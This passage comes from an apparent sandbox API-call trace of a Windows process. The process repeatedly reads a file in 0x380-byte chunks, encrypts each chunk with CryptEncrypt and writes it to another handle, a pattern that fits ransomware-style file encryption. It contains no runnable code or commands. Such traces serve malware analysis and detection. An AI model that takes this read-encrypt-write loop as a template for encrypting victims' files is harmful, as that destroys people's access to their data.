lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.825] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.825] CryptEncrypt (in: hKey=0x2fb548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.825] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.826] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.826] CryptEncrypt (in: hKey=0x2fb548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.826] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.826] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.826] CryptEncrypt (in: hKey=0x2fb548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.826] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.826] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.826] CryptEncrypt (in: hKey=0x2fb548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.826] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.826] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.826] CryptEncrypt (in: hKey=0x2fb548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.826] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.827] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.827] CryptEncrypt (in: hKey=0x2fb548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.827] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.827] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.827] CryptEncrypt (in: hKey=0x2fb548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.827] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.827] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.827] CryptEncrypt (in: hKey=0x2fb548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.827] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.827] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.827] CryptEncrypt (in: hKey=0x2fb548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.828] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.828] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.828] CryptEncrypt (in: hKey=0x2fb548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.828] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.828] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.828] CryptEncrypt (in: hKey=0x2fb548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.828] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.828] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.828] CryptEncrypt (in: hKey=0x2fb548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.828] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.828] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.828] CryptEncrypt (in: hKey=0x2fb548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.828] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.829] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.829] CryptEncrypt (in: hKey=0x2fb548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.829] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.829] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.829] CryptEncrypt (in: hKey=0x2fb548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.829] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.829] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.829] CryptEncrypt (in: hKey=0x2fb548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.829] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.829] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.829] CryptEncrypt (in: hKey=0x2fb548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.830] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.830] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.830] CryptEncrypt (in: hKey=0x2fb548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.830] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.830] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.830] CryptEncrypt (in: hKey=0x2fb548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.830] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.830] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.830] CryptEncrypt (in: hKey=0x2fb548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.830] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.830] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.830] CryptEncrypt (in: hKey=0x2fb548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.830] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.831] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.831] CryptEncrypt (in: hKey=0x2fb548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.831] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.831] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.831] CryptEncrypt (in: hKey=0x2fb548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.831] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.831] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.832] CryptEncrypt (in: hKey=0x2fb548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.832] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.832] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.832] CryptEncrypt (in: hKey=0x2fb548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.832] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.832] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.832] CryptEncrypt (in: hKey=0x2fb548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.832] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.833] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.833] CryptEncrypt (in: hKey=0x2fb548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.833] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.833] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.833] CryptEncrypt (in: hKey=0x2fb548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.833] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.833] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.833] CryptEncrypt (in: hKey=0x2fb548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.833] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.833] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.834] CryptEncrypt (in: hKey=0x2fb548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.834] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.834] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.834] CryptEncrypt (in: hKey=0x2fb548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.834] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.834] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.834] CryptEncrypt (in: hKey=0x2fb548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.834] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.834] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.835] CryptEncrypt (in: hKey=0x2fb548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.835] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.835] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.835] CryptEncrypt (in: hKey=0x2fb548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.835] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 